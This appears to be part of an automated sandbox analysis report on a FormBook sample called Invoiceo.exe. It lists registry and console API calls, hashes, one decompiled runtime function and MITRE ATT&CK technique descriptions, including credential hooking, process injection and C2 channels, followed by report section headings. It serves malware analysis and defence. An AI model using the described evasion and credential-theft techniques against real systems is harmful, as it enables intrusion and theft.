Part of subcall function 0035587B: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0035C0E0), ref: 003558E5
Part of subcall function 0035587B: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 003558F3

Strings

Software\Classes, xrefs: 00354A4E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$Close$CreateOpenValueiswspace
String ID: Software\Classes
API String ID: 1047774138-1656466771
Opcode ID: 652773ea2682ca2f3a750605a805f87dd7995484b2b33da5eabe57bee1533e5d
Instruction ID: c81f4e2cc4681257f68b0e33906f3e91c6e75e3684e5fce46c93ca88ed1aae29
Opcode Fuzzy Hash: 652773ea2682ca2f3a750605a805f87dd7995484b2b33da5eabe57bee1533e5d
Instruction Fuzzy Hash: DB31B631F04214DBCF1AEFB99891FAD76B5AF48705F11442DE402BF2A1EA709D44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 003551C5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0035C0C0,0000001C,00355CE1), ref: 003551F4

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 003552BD

Strings

Software\Classes, xrefs: 003551EA

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: wcschr$CloseOpeniswspace
String ID: Software\Classes
API String ID: 2439148603-1656466771
Opcode ID: f0c33d2d13b737047e13c2c6290f20d975e98650868378037dda620f31553e7a
Instruction ID: dc7f6773d9945a24b3f04cf6d998e8236fa20fa737eaffd4209a192b167492b6
Opcode Fuzzy Hash: f0c33d2d13b737047e13c2c6290f20d975e98650868378037dda620f31553e7a
Instruction Fuzzy Hash: 06219531E04705DBCF16AFF9D8A1AAD76B5AF88701F11442DE806BF2A5EA745D048B50

Uniqueness

Uniqueness Score: -1.00%

Function 0034100C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,00340B7F), ref: 0034CDDF
SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0034CE81

Strings

- , xrefs: 0034CE47

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleTitle
String ID: -
API String ID: 3358957663-3695764949
Opcode ID: a29cc4a2ebdc251d3b3cc1c6a2914055a74527bf6a1a8694a6e2ac86b6fb47c9
Instruction ID: 802c71ea9859c53b700d4295baa379b3686ef9c97411c7d5fcf5e282afa6e661
Opcode Fuzzy Hash: a29cc4a2ebdc251d3b3cc1c6a2914055a74527bf6a1a8694a6e2ac86b6fb47c9
Instruction Fuzzy Hash: 0B212332A0060087C72BAB6CC8557BE77EAAB81705F19412CE9069F265EF306DC6C691

Uniqueness

Uniqueness Score: -1.00%

Function 00358430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00358459
printf.MSVCRT ref: 003584B4

Strings

%3d, xrefs: 00358466, 00358470, 00358496

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
String ID: %3d
API String ID: 2845598586-2138283368
Opcode ID: b5ea4cbd0aa9dc2ff1697f6d24d98dbb8e2d0276768f131107447ad4c779c556
Instruction ID: ff4548cfe072777d98317207cf3c1f79e4c4c4f96b39dd813d752264f3119716
Opcode Fuzzy Hash: b5ea4cbd0aa9dc2ff1697f6d24d98dbb8e2d0276768f131107447ad4c779c556
Instruction Fuzzy Hash: D401B9B16502047BFB236B579C86FEB3E9DDB85BA1F008015FE087D191D9B59C5092B1

Uniqueness

Uniqueness Score: -1.00%

Function 00340C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 003472B5: __EH_prolog3_catch.LIBCMT ref: 00347650

??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
memset.MSVCRT ref: 00340CDD

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 0034CD51

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: H_prolog3_catchmemset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 620422817-3416068913
Opcode ID: c1bffdb5dd2825a71b00e78b7968db6cff83c2755fe0cbff7018595b6e1b41b3
Instruction ID: 6c83de1ac0d5da812b0e6adfcba13a29427b89bc84514f23865d6681e6f6f9ac
Opcode Fuzzy Hash: c1bffdb5dd2825a71b00e78b7968db6cff83c2755fe0cbff7018595b6e1b41b3
Instruction Fuzzy Hash: 2601D872700304DBD7269A799C89F6BB2DDEB80350F15063AF55ADF240DAF6FC4082A0

Uniqueness

Uniqueness Score: -1.00%

Function 0342FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0342FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E033DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03425720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03425720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0342fdda
0x0342fde2
0x0342fde5
0x0342fdec
0x0342fdfa
0x0342fdff
0x0342fe0a
0x0342fe0f
0x0342fe17
0x0342fe1e
0x0342fe19
0x0342fe19
0x0342fe19
0x0342fe20
0x0342fe21
0x0342fe22
0x0342fe25
0x0342fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0342FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0342FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0342FE01

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: d965b875a603d1ffeee9dc30d33b70beecc1addd3f7864c1437f650bd3bd1471
Instruction ID: 4ad49fb907e64a42821551223f1472789285d50a10fd75aa99c07f28c0ab7daa
Opcode Fuzzy Hash: d965b875a603d1ffeee9dc30d33b70beecc1addd3f7864c1437f650bd3bd1471
Instruction Fuzzy Hash: 29F0C276640611BFD621AA45DC42E33BF6AEB85730F540215F628AA1E1DA62A82096A4

Uniqueness

Uniqueness Score: -1.00%

Function 0033DEF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 0033DF07
wcschr.MSVCRT ref: 0033DF18

Strings

=,;, xrefs: 0033DF13

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: iswspacewcschr
String ID: =,;
API String ID: 287713880-1539845467
Opcode ID: aa78db204a7af4e5416e08d864d729e33e43bd473a83f78d01c2fdcc5a147199
Instruction ID: cf1368d5b229c8072d4a139b74fec8f88f4bc52622920e7f9465c4ddf323c438
Opcode Fuzzy Hash: aa78db204a7af4e5416e08d864d729e33e43bd473a83f78d01c2fdcc5a147199
Instruction Fuzzy Hash: B1E0263FA085229253330A0EBCC89B793ECCFEAB20F2B001BF807C3540E7508C4091A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Invoiceo.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre